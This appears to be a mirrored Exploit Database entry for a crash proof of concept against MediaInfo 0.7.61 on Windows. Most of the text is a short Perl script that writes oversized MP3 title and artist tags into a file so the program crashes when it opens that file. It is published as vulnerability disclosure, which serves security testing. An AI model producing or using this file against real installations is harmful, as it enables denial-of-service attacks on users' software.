MediaInfo 0.7.61 – Crash (PoC)

• Exploit Database
• 122 阅读

• 作者： Mohammad Reza Espargham
  日期： 2016-05-10
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39795/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  #!/usr/bin/perl -w # Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit # Tested on Windows 7 / Server 2008 # Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/ # # # Author: Mohammad Reza Espargham # Linkedin: https://ir.linkedin.com/in/rezasp # E-Mail: reza.espargham@owasp.org # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook: https://www.facebook.com/reza.espargham # # Github : github.com/rezasp # # # # 1 . run perl code : perl reza.pl # 2 . open 1.mp3 by mediainfo.exe # 3 . Crashed ;)   use MP3::Tag;   $mp3 = MP3::Tag->new('1.mp3'); $mp3->title_set('A' x 500000); $mp3->artist_set('A' x 500000); $mp3->update_tags(); $mp3->close();